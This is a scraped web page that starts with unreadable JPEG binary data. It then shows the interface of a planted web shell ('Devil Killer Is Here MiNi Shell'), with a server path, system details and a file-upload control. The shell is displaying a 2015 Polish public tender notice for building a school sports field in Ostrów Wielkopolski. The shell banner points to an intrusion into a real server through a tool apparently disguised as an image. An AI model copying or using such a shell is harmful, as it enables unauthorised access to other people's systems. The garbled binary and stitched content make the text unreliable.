JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150206/26972-N-2015.html

<p class="kh_header"><b>Ostrów Wielkopolski: Przedmiotem zamówienia jest wykonanie robót budowlanych związanych z realizacją zadania inwestycyjnego pn.Budowa boiska szkolnego ul.Partyzancka, 63-400 Ostrów Wielkopolski</b><br>
<b>Numer ogłoszenia: 26972 - 2015; data zamieszczenia: 06.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ekonomicznych im. Józefa Gniazdowskiego , ul. Partyzancka 29, 63-400 Ostrów Wielkopolski, woj. wielkopolskie, tel. 62 5919556, faks 62 5919556.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych związanych z realizacją zadania inwestycyjnego pn.Budowa boiska szkolnego ul.Partyzancka, 63-400 Ostrów Wielkopolski.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa boiska szkolnego ul.Partyzancka w Ostrowie Wielkopolskim 
 Zakres zamówienia obejmuje
1	Budowę infrastruktury technicznej podziemnej  w  zakresie
        INSTALACJE  SANITARNE
a  Odwodnienia  boiska  za  pośrednictwem  rur  drenarskich PCV-U 126  perforowanych  o łącznej  długości  61,3  m, połączonych  studzienkami  drenarskimi  szt.  8,
b  kanalizacji  deszczowej  PCV 160    2,2  m,
       INSTALACJE  ELEKTRYCZNE
      a  Zasilanie  obiektu  przewodem  typu  YKY 5 x 10  mm2    15,0  m,
      b  Przewody  YKY  3 x 2,5  mm2    15,0  m,
      c   Przewody  YKY   5 x 10  mm2   34  m,
      d  Przewody  YKY   3 x 2,5 mm2   21,0  m,
      e   Przewody  YKY   5 x 10  mm2  w  rowach  kablowych    76  m,
      f    Przewody  YKY   3 x 2,5 mm2  w  rowach  kablowych    4  m,

2.	Usunięcie wszelkich napotkanych w trakcie realizacji kolizji podziemnych i nadziemnych  na  obszarze  1768,0  m2  +  dojście  instalacyjne  do  budynku  szkoły  +  piwnica  budynku  szkoły    1  kpl. 

3.	Budowę boiska wielofunkcyjnego -  o nawierzchni syntetycznej łącznie z dostawą i montażem bramek do piłki ręcznej  o  łącznej  powierzchni  obszaru  nawierzchni  syntetycznej    1043,03  m2.
Technologia  nawierzchni  sportowej  -  EPDM  z  warstwą  stabilizującą  typu  ET  o  gr.  min.  35  mm  i  nawierzchnią  sportową,  gładką,  przepuszczalną  dla  wody,  dwuwarstwową.  Dolna  warstwa  z  granulatu  SBR  min.  7  mm,  górna  warstwa  wykonana  z  kolorowego  granulatu  EPDM  min.  7  mm.
Wymagane  parametry  nawierzchni  sportowej:
   Wytrzymałość  na  rozciąganie  >=  0,6  MPa,
   Wytrzymałość  na  rozdzierania >=  100  N,
   Ścieralność    0,09  mm,
   Przyczepność  do  podkładu  typu  ED    0,5  MPa,
   Różnica  współczynnika  tarcia  kinetycznego  powierzchni  w  stanie  suchym i  mokrym  <=  0,15,
   Odporność  na  uderzenie,  powierzchnia  odcisku  kuli  550  + -  50  mm2,
  Badania  na  zgodność  z  normą  PN-EN 14877:2008, lub  aprobata  techniczna  ITB,  lub  rekomendacja  techniczna  ITB  lub  wynik  badania  specjalistycznego  laboratorium  badającego  nawierzchnie  sportowe  np.  Labosport.

Podbudowa  o  konstrukcji:
a  grunt  rodzimy
b  Grunt  stabilizowany  cementem  o  grubości    min.  30  cm,
c  nasyp  z  piasku  zagęszczanego  warstwami  o  gr.  25  cm,
d  warstwa  klinująca  z  kruszywa  kamiennego  łamanego  o  gr.  10  cm,
e  warstwa  klinująca  stabilizowanego  mechanicznie  o  gr.  5,0  cm,
f  warstwa  wyrównująca  stabilizowana  mechanicznie    5  cm.

4.	Budowę boiska do koszykówki i siatkówki o  nawierzchni  jak  boisko  wielofunkcyjne    2  kpl.   o nawierzchni syntetycznej, łącznie z dostawą i montażem kompletnych zestawów koszy do koszykówki    2  kpl. i zestawów do siatkówki    2  kpl.,  

5.	Budowę skoczni w dal - rozbieżnia o nawierzchni syntetycznej  o  nawierzchni  jak  boisko  wielofunkcyjne, progi systemowe  -  1  kpl ,

6.	Budowę oświetlenia boisk z naświetlaczami MVP 506  ze  źródłem  HPI-TP 250  W,  mocowanymi  do  słupa systemowego    16  kpl.,

7.	Budowę systemowego  ogrodzenia terenu o  wysokości  4,0  m  -  32,07 + 26,17 = 58,24  m i  6,0  m  -  34,17 + 30,83 + 6,35 = 71,35  m  w  pasach  równoległych  do  ul.  Partyzanckiej  z bramką wjazdową systemową  2,64 x 2,0  m  - 1  kpl.  i furtką wejściową  1,20 x 1,0  m    1  kpl., 

8.	Budowę placu rekreacyjnego z  kostki  brukowej,  betonowej  gr.  6,0  cm  z  14   ławeczkami 180 x 80 x 45  cm  o  konstrukcji  ze  stali  nierdzewnej  i  siedziskach  z  drewna  egzotycznego   108,4  m2, 

9.	Trwałe,  zgodne  z  przepisami  naniesienie  graficzne linii  boiska  wielofunkcyjnego do  piłki  ręcznej  -  1  kpl.,  boisk  do  siatkówki    2  kpl.,  boisk  do  koszykówki    2  kpl.  linie  rodzajów  boisk  w  innych  kolorach. 

10.	Wykonanie zieleni izolacyjnej niskiej  trawnik  w  tym  245,0  m2 na   teokracie    588,8  m2. 

11.	Wykonanie geodezyjnej inwentaryzacji powykonawczej  we  wszystkich  branżach    1  kpl.

       Charakterystyczne parametry techniczne: 
          Powierzchnia  działki  7(14  objętej  zadaniem  inwestycyjnym  -  1768  m2
          Powierzchnia zabudowy  boiskiem  o  nawierzchni  syntetycznej  w  ramach  projektowanego  
ogrodzenia - 1043,80 m2 
          Wysokość i długość boiska : 
            długość z ogrodzeniem: 	31,90 m
             szerokość z ogrodzeniem:   	34,20 m
             wysokość ogrodzenia: 	4,0 (6,0 m.  

3.3. Inne wymagania i uwagi:
      1.   Teren budowy Wykonawca wydzieli ogrodzeniem tymczasowym, o wysokości min.2,0 m, 
            od pozostałego terenu szkoły.
      2.   Dostęp do terenu budowy bezpośrednio z ul. Partyzanckiej,  Wykonawca zapewni za pośrednictwem
bramy tymczasowej zamontowanej po demontażu przęsła  pierwszego  i drugiego ogrodzenia ceglanego od strony  budynku szkoły. Czasowy zajazd i wjazd z pasa drogowego ul.  Partyzanckiej Wykonawca umocuje  prawnie z Miejskim Zarządem Dróg w Ostrowie Wielkopolskim, ul. Zamenhoffa 2b, 63-400 Ostrów  Wielkopolski. Po ustaniu konieczności zapewnienia dostępu materiałowo sprzętowego do terenu  budowy Wykonawca odtworzy zdemontowane przęsło do stanu pierwotnego.
       3.  Składowanie materiału tylko w obrębie terenu budowy.
       4.  Zapewnienie dostępu do energii elektrycznej w gestii  i  na  koszt Wykonawcy. 
       5.  Zapewnienie zaplecza szatniowo socjalno sanitarnego dla pracowników Wykonawcy w gestii
            Wykonawcy, na terenie placu budowy.
       6.  Obowiązuje zakaz przebywania pracowników Wykonawcy na terenie szkoły poza przekazanym
            protokolarnie terenem budowy.     
       7. Wykonawca będzie odpowiedzialny za wady fizyczne przedmiotu umowy z tytułu rękojmi
           w okresie 3 lat, licząc od dnia podpisania protokołu odbioru końcowego.
       8. Wykonawca udzieli zamawiającemu gwarancji na wykonany przedmiot umowy na okres nie krótszy
           niż 3 lata, licząc od dnia podpisania protokołu odbioru końcowego. Okres gwarancji jest kryterium
           oceny oferty w niniejszym postępowaniu.
9.  Przed złożeniem oferty zaleca się dokonanie wizji lokalnej na obiekcie.
10.Na dzień odbioru końcowego zieleń izolacyjna niska trawa musi być zaprowadzona 
11.Na dzień odbioru końcowego wymagane jest oświadczenie o złożeniu dokumentacji
     powykonawczej inwentaryzacyjnej potwierdzone przez Powiatowy Ośrodek Dokumentacji
    Geodezyjnej i Kartograficznej. 

3.4. Przedmiot zamówienia opisują następujące dokumenty:
1.	Projekt architektoniczno-budowlany wielofunkcyjne boisko sportowe- projekt zagospodarowania terenu.załącznik nr 10,
2.	Projekt architektoniczno-budowlany  wielofunkcyjne boisko sportowe - branża sanitarna, kanalizacja deszczowa - odwodnienie boiska  załącznik nr 11,
3.	Projekt architektoniczno-budowlany wielofunkcyjne boisko sportowe- branża elektryczna załącznik nr 12  
4.	Szczegółowe specyfikacje techniczne - wielofunkcyjne boisko sportowe - branża budowlana i zagospodarowanie terenu, załącznik nr 13 
5.	Specyfikacja techniczna wykonania i odbioru robót -  wielofunkcyjne boisko sportowe- branża sanitarna  załącznik nr 14,
6.	Specyfikacja techniczna wykonania i odbioru robót Nr ST-IE-01  wielofunkcyjne boisko sportowe 
      branża elektryczna załącznik nr 15, 
7.   Przedmiar robót wielofunkcyjne boisko sportowe  branża budowlana załącznik nr 16,
8.   Przedmiar robót wielofunkcyjne boisko sportowe branża sanitarna załącznik nr 17,
9.   Przedmiar robót wielofunkcyjne boisko sportowe branża elektryczna załącznik nr 18.
10. Przedmiar robót- wyposażenie boisk załącznik nr 19 

UWAGA!
Przedmiary robót mają wyłącznie charakter pomocniczy. Mając na uwadze, że w niniejszym postępowaniu przyjęto cenę ryczałtową za wykonanie przedmiotu zamówienia, wykonawca przygotuje ofertę jedynie na podstawie projektów budowlanych i specyfikacji technicznych wykonania i odbioru robót, stanowiących załączniki do SIWZ.
Jeżeli w załącznikach do niniejszej SIWZ zostało wskazane pochodzenie marka, znak towarowy, producent, dostawca materiałów, należy je traktować jako przykładowe, mające na celu doprecyzowanie przedmiotu zamówienia oraz określające standard techniczny i jakościowy. Zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych, zgodnie z art. 30 ust. 5 Pzp, pod warunkiem, że zagwarantują one uzyskanie parametrów technicznych nie gorszych od założonych w wyżej wymienionych dokumentach..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.00-8, 45.23.11.00-6, 45.23.14.00-9, 45.31.61.00-6, 45.20.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przed upływem terminu składania ofert wykonawca wnosi wadium w wysokości 
10 000,00 zł. (słownie: dziesięćtysięcyzłotych 00/100 )</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia nie spełnia, na podstawie złożonego wraz z ofertą oświadczenia , o którym mowa w pkt.7.1 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy- w tym okresie, wykonał min.jedną robotę budowlaną polegająca na wykonaniu nawierzchni syntetycznej typu EPDM z warstwą stabilizującą typu ET wraz z odwodnieniem o wartości robót co najmniej 300 000,00 zł.Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia nie spełnia, na podstawie złożonego wraz z ofertą oświadczenia , o którym mowa w pkt.7.1 i 7.2 SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia nie spełnia, na podstawie złożonego wraz z ofertą oświadczenia , o którym mowa w pkt.7.1 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli wykonawca wykaże, że w trakcie realizacji zamówienia będzie dysponował osobami posiadającymi:
a)	uprawnienia budowlane kierownika budowy w specjalności konstrukcyjno-budowlanej bez ograniczeń,
b)	uprawnienia budowlane kierownika robót sanitarnych  w specjalności instalacyjnej w zakresie instalacji, sieci i urządzeń wodno-kanalizacyjnych bez ograniczeń, 
c)	uprawnienia budowlane kierownika robót elektrycznych w specjalności instalacyjnej w zakresie instalacji, sieci i urządzeń elektrycznych bez ograniczeń.
Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia / nie spełnia, na podstawie złożonych wraz z ofertą oświadczeń, o których mowa
w pkt 7.1. i 7.3. SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli wykonawca wykaże, że:
a)	posiada środki finansowe lub zdolność kredytową w wysokości co najmniej 150.000 zł.
b)	jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 200.000 zł.
Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia / nie spełnia, na podstawie złożonych wraz z ofertą oświadczenia i dokumentów,
o których mowa w pkt 7.1., 7.4., 7.5 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie o powierzeniu robót  podwykonawcom. 

2.	w przypadku złożenia oferty przez podmioty występujące wspólnie dokumenty wymienione III.4.1. na spełnienie warunków, o których mowa w pkt.III.3 mogą zostać złożone wspólnie, natomiast dokument wymieniony w pkt III.4.2 i III.4.3  potwierdzający brak podstaw do wykluczenia oraz dokument wymieniony w pkt.III.4.4. dotyczący przynależności do grupy kapitałowej, składa oddzielnie każdy z podmiotów. 
3. Wykonawca, wykazując spełnienie warunku, o którym mowa w pkt.III., może polegać na wiedzy i doświadczeniu innych podmiotów na zasadach określonych w art.26ust.2b ustawy.W tym celu, składa w formie oryginału pisemne zobowiązanie (załączniki nr 8a - 8 d)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - okres gwarancji - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy wymagają formy pisemnego aneksu pod rygorem nieważności i mogą zostać dokonane, o ile nie stoją w sprzeczności z regulacjami zawartymi w ustawie Prawo zamówień publicznych.
2.	Zmiany, o których mowa w ust. 3 mogą:
1)	dotyczyć przedłużenia terminu, o którym mowa w § 2 ust. 1 w przypadku:
a)	konieczności wykonania zamówień / robót dodatkowych, których wykonanie jest niezbędne dla prawidłowego wykonania oraz zakończenia przedmiotu zamówienia wraz ze wszystkimi konsekwencjami występującymi w związku z przedłużeniem tego terminu,
b)	zmiany przepisów prawa Unii Europejskiej lub prawa krajowego, 
co powoduje konieczność dostosowania robót do zmienionych przepisów, które to zmiany nastąpiły w trakcie realizacji zamówienia,
c)	zmian w zakresie projektowym, dokonanych na wniosek wykonawcy lub zamawiającego,
d)	wystąpienia niekorzystnych warunków atmosferycznych, uniemożliwiających  wykonywanie robót zgodnie z technologią potwierdzonych pisemnie przez zamawiającego, przy czym przesunięcie terminu robót nastąpi o tyle dni, przez ile trwało ich wstrzymanie,
e)	pisemnego żądania wstrzymania robót skierowanego do wykonawcy przez zamawiającego, inspektora nadzoru inwestorskiego lub wydania zakazu prowadzenia robót przez organ administracji publicznej o ile żądanie lub wydanie zakazów nie nastąpiło z przyczyn, za które wykonawca ponosi odpowiedzialność,
f)	wystąpienia siły wyższej (np.: wojna, strajk, złe warunki atmosferyczne itd.);
o okres, w którym roboty będące przedmiotem umowy nie będą mogły być prowadzone,
2)	dotyczyć zmian parametrów technicznych realizowanego przedmiotu umowy
w przypadku poprawy parametrów technicznych, jakości, sprawności, wydajności lub innych parametrów charakterystycznych dla danego elementu robót,
3)	być związane ze zmianą przepisów prawa powszechnie obowiązującego, jeśli wpływa ona na zakres lub warunki wykonania przez strony świadczeń wynikających
z umowy.
